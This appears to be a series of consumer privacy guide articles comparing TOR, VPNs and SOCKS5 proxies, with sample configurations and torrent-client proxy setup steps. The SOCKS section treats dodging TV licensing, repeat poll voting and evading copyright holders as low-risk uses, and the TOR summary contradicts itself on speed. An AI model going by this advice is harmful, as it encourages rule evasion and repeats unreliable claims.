Layer 2 Tunnelling Protocol combined with IP Security offers strong encryption, but the heavier CPU processing it requires reduces speed. L2TP/IPsec is a much better replacement for the older PPTP; users simply need to be aware that the increased security and encryption come at the cost of speed.

SSTP – Secure Sockets Tunnelling Protocol

The SSTP protocol is considered a very reliable and easy-to-use protocol. Its advantages include that it will pass through most firewalls, is difficult to block and is natively supported by all Windows platforms from Windows Vista SP1 onwards. Its encryption capabilities are considered moderate and the same applies to its speeds.

OpenVPN

OpenVPN is a newer VPN protocol created and supported by the open-source community. OpenVPN offers the highest level of encryption and, at the same time, is the most flexible protocol available thanks to its ability to run over either TCP or UDP. It requires a VPN client and is supported by Windows, Mac and Android operating systems. OpenVPN is the preferred VPN protocol as it combines flexibility, encryption and speed, and it is also the VPN protocol used by all the VPN Providers in our extensive Best VPN review.
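To give an idea of what this looks like in practice, an OpenVPN client is typically driven by a small text configuration file. The sketch below is illustrative only: the server name and certificate file names are placeholders, and a real VPN provider supplies its own values:

# Minimal OpenVPN client configuration sketch (client.ovpn) - all values are placeholders
client
dev tun
proto udp
# hypothetical VPN server address and port
remote vpn.example-provider.com 1194
resolv-retry infinite
nobind
persist-key
persist-tun
# verify we are talking to a genuine server certificate
remote-cert-tls server
cipher AES-256-GCM
auth SHA256
verb 3
# certificates and keys are issued by the VPN provider
ca ca.crt
cert client.crt
key client.key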

When to use TOR

This ‘dark onion science’ is more widespread than you might think: TOR is used by millions of people around the world every day, which makes the TOR vs VPN comparison all the more interesting.

Here are a few examples where TOR can be used, in general:

By Social Workers, Activists & Journalists without Borders

To avoid media censorship while working with sensitive information or on secret projects

By Parents & Households

To prevent digital stalking, image abuse and cyber spying.

By Law Enforcement Agencies and Military Personnel on Undercover Missions

To stay away from the media eye and government hacking/monitoring groups

By Bloggers, Job Professionals or Normal People

To increase their privacy over the internet or simply to avoid cyber theft.

Hidden Internet Services

This is a very interesting application of TOR. Hidden Services allow a host to run its website or service without disclosing its identity; here, TOR provides anonymity to websites and other servers. These websites don’t even have a regular URL such as www.firewall.cx – instead, TOR uses a randomly generated 16-character .onion address as the domain name. When a TOR user tries to access a hidden-services website, the browser identifies the domain via public keys and introduction points stored in a distributed hash table within the TOR network. If the user doesn’t have TOR installed, however, there is no way of accessing these hidden internet services.

Apart from the above mentioned applications, the most common applications that use anonymous internet via TOR are Internet Relay Chat (IRC), Instant Messaging (IM) and World Wide Web (www) browsing.
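For the technically curious, a locally running TOR client exposes a SOCKS proxy (by default on 127.0.0.1:9050) that ordinary applications can use to reach both regular websites and hidden services. Below is a minimal Python sketch; it assumes the requests library is installed with SOCKS support, and the .onion address shown is made up purely for illustration:

# Sketch: routing an HTTP request through a locally running TOR client.
# Assumes: pip install "requests[socks]" and a TOR client listening on 127.0.0.1:9050
import requests

# The socks5h:// scheme makes name/.onion resolution happen inside the TOR network
proxies = {
    "http":  "socks5h://127.0.0.1:9050",
    "https": "socks5h://127.0.0.1:9050",
}

url = "http://exampleonionaddr.onion/"     # hypothetical hidden-service address
response = requests.get(url, proxies=proxies, timeout=60)
print(response.status_code)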

When to use VPN (VPN Service Provider)

There is no doubt that VPNs are far more popular than TOR; nevertheless, let’s take a quick look at the common reasons people prefer to use VPNs:

To Access Restricted Websites – Bypassing Geo-Location Restrictions

Netflix and Hulu are the most common examples here. Users who want to access their Netflix or similar account often cannot do so when travelling overseas. With a VPN service you can connect to one of your provider’s VPN servers and access the online content as if you were located in that country – effectively bypassing any geo-location restriction. Another example is trying to access a domain or website that is blocked from your country, e.g. accessing Facebook from China.

Our Best VPN Service Provider comparison also includes VPN Providers that provide access to Netflix and Hulu.

For Downloading via Torrents & Avoiding Bandwidth Throttling

Torrent downloading is often assumed to mean downloading illegal or pirated software; however, this is not always the case, as many vendors legally distribute their software via Torrents. ISPs unfortunately tend to “unofficially” throttle user bandwidth when they detect Torrent traffic. With a VPN all traffic is encrypted, so the ISP cannot single out Torrent traffic for throttling.

Secure Mobile Device Internet Data

Users tend to use their mobile devices today to access all sorts of content while commuting to work, casually surfing the internet or checking their bank accounts. No matter what the activity, with a VPN Service Provider that supports mobile clients users are sure that all their data and activities are encrypted and protected.

Authenticating to Websites or Private Resources (Email, Internet Banking etc)

When you are signing in with your credentials to an online resource, it’s always better to protect yourself from crawler bots and cyber fraud artists. A VPN will ensure your traffic is encrypted so anyone monitoring your traffic (e.g. at a public hotspot) won’t be able to see the data that is being transferred.

On Travel or Business

On the road or at a hotel, a VPN is just the right tool if you travel. VPNs help bypass firewall restrictions, providing full internet access no matter where you might be.

TOR vs VPN: TOR Advantages and Disadvantages

Advantages Include:

High Level of Anonymity

TOR gives you such a high level of anonymity that it is almost impossible for a website to track you; the Onion Routing technology leaves practically no way for your pathway to be traced.

Free To Use

TOR is completely free!

Reliable

Unlike VPNs, where your privacy depends on how trustworthy your VPN Service Provider is, TOR does not require you to place your trust in any single operator. Because the relay nodes are selected at random and no node knows the full path, there is no single party you need to rely on.

Disadvantages include:

Untrusted Exit Nodes

Since data packets are decrypted at the exit node, whoever runs that exit node can read, misuse, leak or manipulate the information you send, unless it is separately encrypted (e.g. over HTTPS).

Blocked Relays

Some relays are tracked and blocked by ISPs, which can make it genuinely difficult for users to connect.

Slow Processing

Since data packets are routed through a number of proxy servers, the connection can be slow. This becomes frustrating when streaming or downloading large files such as videos.

Unsuitable for Data-metered Plans

If your internet plan includes a specific amount of data, e.g. 10GB/month, TOR can become a problem: routing every request through multiple hops adds overhead, and if you configure your client to act as a relay, your bandwidth will also be used to carry other TOR users’ traffic. Either way, your monthly data allowance can be depleted quickly.

TOR vs VPN: VPN Advantages and Disadvantages

Advantages include:

Variety of Security Encryption Levels Depending on your Online Activities

Whether you need to access your email, download torrents, stream videos, perform internet banking transactions or anything else, you can select the protocol and encryption level that best suits the task – favouring speed for some activities and heavier security for others.

Compatible with Almost Any Device

VPNs are compatible with almost any iPhone or Android device, Windows PC or Mac. Tablets, including the iPad, are also capable of running VPN client software. This makes it very easy for novice users to install a VPN client and securely connect to the internet.

Fast Speed

Going from multiple proxies/nodes down to just one automatically makes data transmission over a VPN faster than over TOR, which makes VPNs highly suitable for torrenting or downloading large files. VPNs also allow you to select the server you connect to – an option that can considerably improve the overall download speeds achievable via a VPN connection.

Easy Availability, Installation and Support

Unlike TOR, VPNs are widely available and are operated by commercial companies that ensure fast, good-quality service for their clients. If you have a problem, there is almost always someone at the support desk who can help you via email or live chat.

Ability to bypass Firewall Restrictions

With the use of a VPN you can pretty much bypass any protocol or URL restriction in place, effectively opening the internet to your device.

Disadvantages:

Despite the many advantages of VPNs, there still remains a fly in the ointment. Since your information passes in and out of the tunnel, the company operating the VPN has access to this information. The best way to protect yourself from your VPN Provider is to ensure it has a no-log policy, meaning it does not log any data or user activity on its VPN Servers. Our Beginners Guide to VPNs article provides all the necessary information new or existing VPN users need, including security concerns and VPN features that help enhance your protection.

TOR vs VPN: Summary

So the comparison comes down to this: both TOR and VPNs have their own pros and cons, and both are good choices as long as you understand your needs, the level of anonymity you want over the Internet, and the price – in time and money – you are willing to pay. If you want to secure your Internet privacy and have a fast, unmetered (unlimited bandwidth) connection, TOR is a great option. If you need fast download speeds, the ability to bypass firewall restrictions, or simply greater flexibility and better control over how you consume your monthly data plan, then a VPN is your solution.

In the comparison of TOR vs VPN, the user is the winner. And to the hackers and government agencies all we can say is, no snooping around!


Complete Guide to SOCKS Proxy - How to Securely Bypass Blocks, Safe Torrenting, Free Proxy List, Anonymous Proxies, Access Restricted Content

The internet is in a strange place right now. It’s no longer the open, free place it used to be; increasingly, users are being subjected to website blocks, attacks and surveillance. For true safety or anonymity, precautions must be taken. Thankfully, there are many ways to protect yourself, one of them being Socket Secure (SOCKS) proxies.

While many have heard of SOCKS proxies, few truly understand their purpose, how they work and the level of security and privacy they can offer. SOCKS proxies are often mistakenly considered an alternative or equivalent to VPNs, causing major confusion amongst users and providing a false sense of security.

In this article we’ll cover a wealth of topics relating to SOCKS proxies: SSL, configuration advice, torrenting via SOCKS, how they compare with VPNs and much more. Let’s take a quick look at what we have in store before diving deeper:

Introduction To SOCKS Proxies

Like HTTP, SOCKS is an internet protocol, but it offers a further degree of anonymity. Connecting to a SOCKS proxy routes your traffic through a third-party server via TCP, assigning you a new IP address in the process. Because the IP address is different, web hosts can’t determine your physical location.

This has the add-on effect of bypassing regional filtering. However, unlike a VPN, SOCKS doesn’t provide encryption. This means users don’t have true privacy and aren’t safe from attacks on Public WiFi and government surveillance. In addition, SOCKS doesn’t run through every application, meaning regular browsing is not always safe.

However, this lack of encryption does provide some benefits. The main one is speed. A SOCKS proxy doesn’t need resources to encrypt traffic and has far less overhead, so it’s usually faster than a VPN. Though proxies don’t provide protection from monitoring, they are a nice middle ground between HTTP and VPNs.

The security of a SOCKS proxy also depends on the version it utilizes. Most modern proxies use either SOCKS4 or SOCKS5 to protect users, and there are some fundamental differences. As you would expect from a lesser version, SOCKS4 has fewer features.

One example is the lack of support for UDP-based applications. This cuts out programs that need faster, more efficient transfers, like games. SOCKS5 also supports IPv6 and Domain Name Resolution, which means the client can specify a hostname rather than an IP address; this particular feature is also supported by SOCKS4a.

As well as SOCKS, users can utilize the HTTP/HTTPS proxy method. HTTP proxies work similarly to SOCKS5, but utilize the HTTP protocol instead. This is the same method that transfers data to your computer when you type https://www.firewall.cx. These proxies fetch and receive primarily in HTTP and are generally used for web browsers. Some applications support HTTP proxy, others SOCKS proxy, and many both. HTTP is more intelligent than SOCKS5, but also less secure.

Due to lack of UDP support and limited TCP support, HTTP proxies don’t fully support torrenting. Often, they will filter out this type of data or block it. This blocking is especially prevalent in public HTTP proxies. In addition, HTTP tries to re-write the headers of the data in transit. The result is extremely slow or non-existent torrenting.

Understanding How HTTPS Encryption - SSL & HTTPS Proxies Work

HTTPS proxies utilize something called the Secure Sockets Layer (SSL). In your browser, you’ll notice this as a green padlock next to the URL bar:

https enabled website - green lock

In short, SSL creates a secure connection between the web server and the user’s browser. When you request a URL, the server sends your browser a copy of its SSL certificate. The browser verifies that it’s authentic, and the server then sends back a signed acknowledgment. Upon arrival, both start an SSL encrypted session and can share data safely.

This encryption uses a method called public key cryptography. A server using SSL has both a public key and a private key. When a server first negotiates an SSL session with a client, it sends a copy of its public key. The client’s browser verifies the certificate and then uses the public key to encrypt a symmetric session key, which is sent to the server. The private key is never sent and is always kept secret.

How HTTPS & SSL works

The symmetric key is unique to the SSL session and used to encrypt/decrypt data exchanged between the client and server.
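The client side of this negotiation can be observed with a short sketch using Python’s standard-library ssl module: it verifies the server’s certificate against the trusted CAs, completes the handshake and reports the agreed protocol and cipher. Pinning a modern minimum TLS version, as shown, also helps guard against the downgrade attacks discussed below:

# Client-side sketch of an SSL/TLS handshake using only Python's standard library
import socket
import ssl

hostname = "www.firewall.cx"                       # any HTTPS-enabled website

context = ssl.create_default_context()             # loads the system's trusted CA certificates
context.minimum_version = ssl.TLSVersion.TLSv1_2   # refuse weak, downgraded protocol versions

with socket.create_connection((hostname, 443)) as tcp_sock:
    with context.wrap_socket(tcp_sock, server_hostname=hostname) as tls_sock:
        # At this point the handshake is complete: certificate verified, session keys agreed
        print("Negotiated protocol:", tls_sock.version())   # e.g. TLSv1.3
        print("Cipher suite:", tls_sock.cipher())
        print("Certificate subject:", tls_sock.getpeercert().get("subject"))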

HTTPS proxy works slightly differently. Using the CONNECT method, requests are converted to a transparent tunnel. However, this feature isn’t available in a lot of proxies and, when it is, users can still be vulnerable.

Some SSL implementations are still open to attack through the Heartbleed bug. This serious OpenSSL vulnerability was discovered in 2014 and allows attackers to steal private keys from servers, eavesdrop on communications and gain access to passwords, emails and instant messages. Vulnerabilities in SSL and its successor TLS have been found several times since then, including man-in-the-middle attacks that downgrade the user to a less secure version.

How SOCKS5 Proxy Works

While an HTTP proxy is designed to work in the web browser, a SOCKS5 proxy is more wide-reaching. SOCKS sits in the middle of the OSI model: below SSL, which operates up at the application layer (Layer 7), and above TCP and UDP on the transport layer (Layer 4). This offers several advantages. TCP works by establishing a connection between the client and the server and tries to guarantee that every packet arrives at the destination in the same order it was sent; to do this, it packages all the content into a fixed format.

UDP, by contrast, is connectionless and doesn’t guarantee delivery or ordering, which makes it faster and well suited to applications such as streaming and gaming. Another use of UDP is in the Domain Name System (DNS), which allows for the translation of URLs into IP addresses. The combination of both TCP and UDP creates a more flexible and reliable experience.

The low level of SOCKS5 also means it can handle several different request types: HTTP, HTTPS, POP3, SMTP and FTP. As a result, SOCKS5 can be used for email, web browsing, peer-to-peer and more. More importantly, users can do this in a somewhat anonymous fashion.

When you connect to a website, the traffic usually runs through a firewall on the router or at the ISP. A SOCKS5 proxy routes your data through its proxy server, creating a path through the network’s firewall. In doing so, the user is assigned a new IP address, which makes it look like they’re browsing from a different location and protects their identity.
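In practice, pointing an application at a SOCKS5 proxy is a one-line change. The Python sketch below is illustrative only – the proxy host, port and credentials are placeholders – and it assumes the requests library is installed with SOCKS support:

# Sketch: sending web traffic through a SOCKS5 proxy so the remote site sees
# the proxy's IP address rather than yours.
# Assumes: pip install "requests[socks]" - the proxy details below are placeholders.
import requests

proxy = "socks5h://username:password@proxy.example.com:1080"
proxies = {"http": proxy, "https": proxy}

# httpbin.org/ip simply echoes back the IP address it sees
print(requests.get("https://httpbin.org/ip").json())                   # your real IP
print(requests.get("https://httpbin.org/ip", proxies=proxies).json())  # the proxy's IP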

As mentioned before, proxies don’t encrypt data the way a VPN does, which means you can use these services with very little slowdown. There is also no need to re-write header data, which in turn means fewer errors, and fewer errors mean more speed.

Although it doesn’t handle encryption, SOCKS5 does provide methods of authentication, as mentioned earlier. In general, a SOCKS5 handshake looks like this:

  1. The client sends a connection request, stating the list of authentication methods it supports.
  2. The server looks at these methods and chooses one. In the case that none are acceptable, it sends a failure response.
  3. Once accepted, information can pass between the client and server. The client can send a connection request and the server can respond.

This authentication removes many of the security concerns that plagued SOCKS4. The proxy isn’t open to anybody who happens to have its address, resulting in less chance of malicious use. Usually, authentication comes in the form of a simple username and password combination; however, SOCKS5 also supports GSSAPI (Generic Security Services Application Program Interface) and other IANA-registered methods.
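The handshake itself is tiny. The following standard-library Python sketch (with placeholder proxy details) walks through the greeting, the username/password sub-negotiation and a CONNECT request, following RFC 1928 and RFC 1929:

# Sketch of a raw SOCKS5 greeting, username/password authentication and CONNECT
# request (RFC 1928 / RFC 1929). Proxy address and credentials are placeholders.
import socket

PROXY = ("proxy.example.com", 1080)
USERNAME, PASSWORD = b"user", b"secret"

with socket.create_connection(PROXY) as s:
    # 1. Greeting: version 5, one supported method, 0x02 = username/password
    s.sendall(b"\x05\x01\x02")
    version, method = s.recv(2)
    assert version == 5 and method == 0x02, "server rejected our authentication method"

    # 2. Username/password sub-negotiation (status 0x00 means success)
    s.sendall(bytes([1, len(USERNAME)]) + USERNAME + bytes([len(PASSWORD)]) + PASSWORD)
    _, status = s.recv(2)
    assert status == 0, "authentication failed"

    # 3. CONNECT request: command 0x01, address type 0x03 = domain name, port 80
    dest = b"www.firewall.cx"
    s.sendall(b"\x05\x01\x00\x03" + bytes([len(dest)]) + dest + (80).to_bytes(2, "big"))
    reply = s.recv(10)
    assert reply[1] == 0, "connection request refused"
    # From here on, anything sent over 's' is relayed to www.firewall.cx:80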

Why Would I Use a SOCKS5 Proxy?

Now that you know the features of SOCKS5 proxies, you may be wondering why you even need one. One of the main uses is to circumvent internet censorship. If your ISP blocks access to movie streaming websites, The Pirate Bay or other questionable content, a proxy will circumvent it. This can be useful on restricted networks. Work and school connections are often monitored and block access to social media, games, and anything else that isn’t relevant. Broad sweeping policies can often cause issues if you need to access one of those sites for research or you just want to slack.

You’ll also be able to access services that are limited to certain countries. BBC iPlayer, for example, is only available from a UK IP address. A proxy located in the UK would allow you to watch British TV without a TV license. This also applies to services like Netflix, which has significantly more content in the US region than others. Utilizing a SOCKS5 proxy from several different locations can significantly expand your viewing catalogue.

On home networks, users must be careful about their privacy, especially when torrenting. Using a SOCKS5 proxy can provide fast download speeds while adding a layer of protection against copyright holders. Many BitTorrent clients support a weak form of encryption when using SOCKS5, which prevents further obstacles.

SOCKS5 torrenting doesn’t offer the same protection as a VPN, but it’s better than nothing at all. In addition, it can give an obscured connection from only one application on your PC. As a result, you can perform fast P2P downloads while still using location services such as Google Maps. You’ll retain your normal download rate for any other browsing or streaming.

When to use SOCKS5 Proxies, VPNs or Both

For the privacy and security conscious, VPNs are a great option. They are superior to a SOCKS5 proxy in almost every way. The Best VPN Service Providers give unparalleled protection from government agencies, copyright holders and hackers. Many of them even provide proxy services as a free add-on. Other than speed, VPNs do everything SOCKS5 does and more. However, VPN subscriptions can be more expensive and require extra setup to run. In some situations, a proxy is the most economical option.

When it comes to accessing content with region restrictions, for example, a SOCKS5 proxy is great. You can easily spoof a different location, and don’t have to worry too much about security – repercussions are rare. You can find a proxy from almost every country on the planet, often free of charge. A VPN will provide the same benefit, but comes from a trusted provider who has put considerable thought into the safety and privacy of its users.

SOCKS5 proxies can hide your identity from web servers. Low stakes tasks like voting on polls multiple times from the same computer are fine. Most don’t make use of cookies or JavaScript to track the same browser across multiple IPs.

However, if you’re accessing blocked content, things are a little different. While a proxy is good for low stakes, it doesn’t remove identifying information other than the IP address. It’s open to snooping from anyone with access to your data stream, such as your ISP and government. Accessing censored file-sharing websites and other questionable content is best done through a VPN.

This lack of protection from those with network access can pose considerable risk in public. No encryption means little protection from prying eyes. On a WiFi hotspot, attackers can still see and interpret your data. Browsing websites without SSL encryption could result in password and information compromises. Furthermore, the previously mentioned security issues in SSL mean that hackers could get hold of it even then. For public WiFi safety, a VPN is the only true option.

Combine a SOCKS5 Proxy and a VPN

It’s clear that there are some merits to using a proxy over a VPN. The extra speed makes them suitable for a wide range of low-risk tasks, and it’s advantageous to be able to utilize both a VPN and a SOCKS5 proxy. Thankfully, many of the Best VPN service providers supply this at no extra cost – Strong VPN is a great example. Switching between the two methods is a no-brainer, but what about using both at once?

Using both in tandem usually results in increased privacy, if it’s supported by your VPN provider. Be that as it may, the benefits are limited. If a VPN is connected already, you probably won’t see speed increases; instead, the advantage comes as a safety net. If your VPN cuts out and the Kill-Switch fails, you still have some protection from the SOCKS5 proxy, and vice versa. This is relevant if a provider hands over your details – the copyright holder will only see the IP address of the other service. Using both creates an extra barrier to entry.

For most users, this extra barrier is far from essential. A properly configured VPN should pose little problem. However, if you’re doing something particularly sensitive the combination is a good option. For the best security, you should email your provider and make sure your SOCKS5 VPN proxy has no logs.

SOCKS5 Proxy vs VPN For Torrenting & P2P

Speaking of torrenting, it’s important to be aware of the benefits and limitations of using a SOCKS5 proxy for it. With SOCKS5 torrenting, a media company looking through a torrent swarm will see only the IP address of the proxy server, and the torrent client can add a small amount of encryption on top. This gives the small degree of protection mentioned earlier.

However, there are still many avenues of attacks for copyright holders. The encryption method torrent clients use is shaky and not reliable. It can be cracked quickly, revealing the information beneath. Although this wouldn’t reveal the user’s IP address, it could give information such as the version of the client, the operating system, settings and download speed. Copyright holders could use this to narrow down to an individual user and their ISP. They can then send a legal request to that ISP for information. The lack of proper encryption means the ISP can clearly see what a user is doing on its network.

SOCKS5 torrenting does provide an increase in speed, but it comes at a price. A determined copyright troll or government entity may still get leverage over the user. In the end, it’s up to the individual to decide if the speed increase is worth the risk. This will probably depend on how significant the difference is.

There is an additional consideration here. A fully-fledged VPN won’t just protect you from copyright holders, it will also bypass ISP throttling. It’s becoming increasingly common for service providers to set speed limits on peer-to-peer downloads, resulting in speeds as low as one fifth of normal. Service providers can only do this if they can interpret and categorize the data, so VPN encryption provides a natural wall.

Proxies do not generally provide encryption, so you may experience significant throttling. This can easily offset the speed gains of SOCKS5, meaning proxies are only the best option if your ISP does not throttle. You can test for throttling through web services like Glasnost. Even with the encryption built into torrent clients, most service providers can tell if you’re using P2P. If you’re unsure, you can always test with a free proxy.

Configuring SOCKS5 Proxy for Torrenting

Thankfully, setting up a SOCKS5 proxy for torrenting is very simple. It requires fewer steps than a VPN, and all you’ll need is a torrent client. In our examples, we’ll be using qBittorrent and uTorrent with SOCKS5 proxies from IPVanish and Private Internet Access. Both providers include the functionality with their subscriptions at no extra charge and offer a premium service with a no-logs policy.

Set up a SOCKS5 Proxy with IPVANISH and qBittorrent

To emphasise the divide between the two services, IP Vanish’s SOCKS5 details can’t be found in the regular VPN client. Instead, you’ll have to go to the My Account section of its website and click on the SOCKS5 Proxy tab.

ipvanish proxy settings

You’ll want to note down these credentials for use later. The username and password are specific to you and provide the SOCKS5 authentication mentioned earlier. The hostname, ams.socks.ipvanish.com, can be used instead of an IP address thanks to SOCKS5’s Domain Name Resolution feature. If you’re using a different proxy, just take note of those details instead.

For an extensive review on Strong VPN, including security tests, DNS Leak tests, Torrent Protection, Kill-Switch test, Netflix support and much more, read our Best VPN Review: Strong VPN

Now, in qBittorrent, head to Tools > Options. On the left-hand side, you’ll see the Connection tab. Click it. You should be presented with the following menu:

qbittorrent settings

Under the Listening Port heading, disable Use UPnP/NAT-PMP port forwarding from my router. Then input the following details under Proxy Server:

  • Type: Socks5
  • Host: ams.socks.ipvanish.com
  • Port: 1080
  • Use proxy for peer connections: Yes
  • Disable connections not supported by proxies: Yes
  • Use proxy only for torrents: Yes
  • Authentication: Yes
    • Username: IP Vanish SOCKS5 generated username
    • Password: IP Vanish SOCKS5 generated password

qbittorrent SOCKS5 Proxy settings for Torrenting

For extra privacy, head to BitTorrent and change Encryption mode to Require encryption. This will force the in-application encryption discussed earlier. Also tick Enable anonymous mode. This will remove the peer ID from the client’s fingerprint and force all incoming connections through SOCKS5.

qbittorrent SOCKS5 Proxy settings for Torrenting

Finally, hit Apply and Okay. Restart qBittorrent just to be safe.

Set Up a SOCKS5 Proxy With Private Internet Access & uTorrent

Finding your SOCKS5 VPN proxy settings for Private Internet Access is equally simple. Go to the client sign in page and login with your username and password. Scroll down until you see a heading with the label PPTP/L2TP/SOCKS Username and Password. Click Generate Username and Password and note down the details:

pia vpn socks5 setup

The hostname isn’t listed here, but a support article reveals that it’s proxy-nl.privateinternetaccess.com. Write that down too, or the details of your free proxy. Launch uTorrent and go to Options > Preferences (Ctrl + P).

utorrent pia vpn socks5 settings

Under the Connection subheading, disable Enable UPnP port mapping and Enable NAT-PMP port mapping. Then enter the following settings under Proxy Server:

  • Type: SOCKS5
  • Proxy: proxy-nl.privateinternetaccess.com
  • Port: 1080
  • Authentication: Yes
    • Username: PIA SOCKS5 user
    • Password: PIA SOCKS5 password
  • Use proxy for hostname lookups: Yes
  • Use proxy for peer-to-peer connections: Yes
  • Disable all local DNS lookups: Yes
  • Disable all features that leak identifying information: Yes
  • Disable connects unsupported by the proxy: Yes

utorrent pia vpn socks5 settings

To enable encryption, go to the BitTorrent subheading and look under the Protocol Encryption menu. Change Outgoing to Forced. Be aware that this could impair your ability to connect to peers. Click Apply and OK. SOCKS5 torrenting is now enabled.

Configuring Firefox and Chrome to Use SOCKS5 Proxy

Configuring your browser to use SOCKS can be a little more difficult. At this moment in time, neither Chrome nor Firefox supports SOCKS5 with authentication by default. Instead, you can use the Maxthon browser. After installing it, go to Settings > Advanced > Proxy Settings.

maxathon web browser socks5 settings

Now tick Use custom proxy setting and hit Manage Proxy. Click Add. Fill in the fields as follows:

  • Name: IPVanish SOCKS5
  • Type: SOCKS5
  • Address: ams.socks.ipvanish.com
  • Port: 1080
  • Username: IP Vanish SOCKS5 generated username
  • Password: IP Vanish SOCKS5 generated password

maxathon web browser IPVanish socks5 settings

Hit OK. Below the config, you’ll see a Bypass proxy server for heading. Here you can set exceptions for websites for which you need to keep your local IP, such as Google Maps. You can also switch this to Use proxy server for and only use the VPN SOCKS5 proxy on certain websites.

Free Proxy vs Paid

Though premium paid SOCKS5 proxies like the one above are often best, it’s possible to get one free of charge, and many websites compile free proxy lists that are open for anyone to use.

If you already have a VPN, you may have access to a free SOCKS5 proxy without even knowing it, as it’s becoming increasingly common for the Best VPN service providers to offer this service.

It may be tempting to just grab the first free SOCKS proxy you see, but there are a few things to consider. A free anonymous proxy isn’t going to be fast. It’s more common for download speeds to sit in the kilobytes rather than megabytes. You’ll also notice far less reliability, so you’ll probably have to switch between different servers for long downloads. This unreliability extends to response time.

In addition, a free anonymous proxy often lacks security; in many cases there is no security at all, leaving users open to hackers. Free providers also frequently keep logs, which may cause issues for P2P downloads and other sensitive activities.

In all, you’ll be hard pressed to find a good, reliable free proxy. If you want to protect your identity, paying is almost essential. In some cases, you can pick up a full VPN service for the same price or less than premium SOCKS5 services, making it a no-brainer. You’ll have access to strong encryption when you need it, and a proxy when you’re just looking for speed.

Using SOCKS5 Proxy For US Netflix

One of the best uses of a SOCKS5 proxy is for Netflix. The catalogue of the service has been limited of late, and people outside the US seem to be particularly affected. Thankfully, you can trick Netflix into giving you shows from regions across the world. Here’s my Netflix UK homepage before using a proxy:

Netflix UK homepage without SOCK5 proxy

In this example, we’ll be using Firefox. Go to the flyout menu on the top right, then select Options. Go to Advanced and click the Network tab. Under Connection > Configure how Firefox connects to the Internet, click Settings…

firefox socks5 settings for netflix

First, change Configure Proxies to Access the Internet to Manual proxy configuration. Under SOCKS Host enter the URL or IP address of your proxy server. Under Port, enter the number your Netflix SOCKS5 proxy has provided. Tick SOCKS v5 and Proxy DNS when using SOCKS v5.

netflix us homepage after socks5 configuration

You can now click OK and head to https://netflix.com. You should immediately notice a change in your browsing catalogue.
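If you prefer not to click through the dialog each time, the same settings can be applied by placing the following lines in a user.js file in your Firefox profile folder; the host and port shown are placeholders for your own proxy’s details:

// user.js sketch - the equivalent of the manual SOCKS proxy settings above
// (proxy host and port are placeholders for your own provider's details)
user_pref("network.proxy.type", 1);                      // 1 = manual proxy configuration
user_pref("network.proxy.socks", "proxy.example.com");
user_pref("network.proxy.socks_port", 1080);
user_pref("network.proxy.socks_version", 5);
user_pref("network.proxy.socks_remote_dns", true);       // "Proxy DNS when using SOCKS v5"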

Unfortunately, those with a free SOCKS proxy may get stuck here. Netflix monitors proxy lists and blocks them to stop users accessing content they aren’t supposed to. You’ll know if you receive the following error when trying to play a show:

Trying to access Netflix US via Free SOCKS Proxy fails

You may be able to find a free proxy that Netflix hasn’t gotten around to yet, but it’s quite unlikely. A paid, private SOCKS5 proxy is less likely to be blocked, as the provider changes things often. You should notice much faster buffering times, so it’s worth paying the small monthly fee.

Most VPN SOCKS5 proxies use authentication, which isn’t supported by Firefox or Google Chrome. Instead, you’ll want to use the previously mentioned Maxthon browser method. This should give you fast, unblocked access to different films.

Summary

While SOCKS5 proxies offer better protection than plain HTTP or nothing at all, they don’t shield the user from spying by ISPs or governments. Free anonymous proxies offer even less protection and can be open to hackers, cut out, or suffer from slow download speeds. However, subscription-based proxies remain a great way to bypass regional blocks and carry out other low-risk tasks.

Unfortunately, the price of a standalone SOCKS5 proxy is high compared to other services. In many cases, users can get a VPN subscription from STRONGVPN, Private Internet Access or NordVPN and a VPN SOCKS5 proxy for the same monthly fee. This gives users access to the full, hardened security of a VPN, while also providing a fast, less secure proxy if they need it.


Anonymous Browsing – Internet Privacy. Securing Your Online Privacy The Right Way

Despite what some think, the internet is not private. Anonymous browsing and Internet privacy are almost non-existent in today’s online world. Websites collect personal information on every visit without your knowledge. Despite the ‘free’ label, online services come at a cost, and in many cases that cost is a lack of privacy.

The primary driver is the advertising industry. Most websites get paid if an ad is clicked or the product is purchased, not just for exposure. As a result, they want promotions that are relevant to the user. They get paid, and the user gets to see the products they’re interested in. It seems advantageous to both parties.

However, to target these ads, agencies need information about a website’s users. Companies like Facebook embed trackers across the web to build a detailed profile of individuals. This includes things like your gender, age, location, and websites you frequent. Information from multiple ad agencies can then be combined to build a detailed picture of your interests and personality.

firefox lightbeam plugin

Firefox's Lightbeam Plugin provides a visual map of sites visited during our session

Here’s the result of two hours of browsing activity with the Lightbeam plugin. The circles are sites we visited, while the triangles are third parties. Together, they create an interconnected web of information: visiting just 32 sites fed data to 371 third parties!

They can do this across the web through identifying information like your IP address. When you connect to a network, your device is given a unique string of numbers by the ISP or mobile service provider. These can be cross-referenced across the internet to find your browsing habits.

If that’s not enough, there are also government agencies to worry about. IP addresses usually give websites a rough idea of your location by pointing to your service provider. That’s not a barrier for government. They can ask the ISP who the IP was assigned to and find your name and address. You would think that such power would be used sparingly, but unfortunately, it’s not.

Former NSA contractor Edward Snowden revealed that major powers are spying on citizens across the world on an unprecedented level. Authorities request all that tracking data we mentioned earlier and combine it with information from the internet service provider (ISP). From 2011-2012, Australian agencies requested ISP logs over 300,000 times. This can include every website the user has visited over a period of years.

And that is a party that supposedly has the country’s best interests at heart. This kind of information is also accessible to a number of people who work for the ISP. Earlier this year, an ex-technician for Verizon pleaded guilty to selling phone call and location information to a private investigator. Web browsing information could equally be sold off to the highest bidder.

And that’s assuming they even have to buy it in the first place. In 2012, the internet activist group Anonymous hacked into the servers of telecommunications company AAPT. They stole over 40GB of information relating to business customers to show that such logs are not always safe. A redacted copy of the data was later published online.

What is the Threat?

With so many parties interested in such data, anonymous browsing is becoming difficult. The sad fact is that without protection from the Best VPN providers, you aren’t truly safe.

Firstly, there’s the threat of this information falling into the hands of hackers. Imagine a person with malicious intent having a record of your name, address, interests, habits, and every website you’ve been to. It could easily be used to blackmail someone or make threats to their friends and family.

It can also be used to identify potential weak points in your security. For example, if you regularly visit an insecure site, it could be hacked with an end goal of getting to you. Tools such as a key logger could then be used to collect usernames, passwords, and credit card data.

Furthermore, such access can be used for identity theft. Combined with an email account, an attacker has access to basically everything: password resets for various accounts, your name, age and date of birth. Bank details can be used to place illegal purchases on your behalf or commit fraud. Most of our lives are stored online, and the attacker could gain access to all of it.

The same methods can be used by authorities in oppressive regimes. Even if the current government protects its citizens from such things, a power shift could change that. Because tracking information and ISP logs are kept for a long time, the data will still be around years into the future.

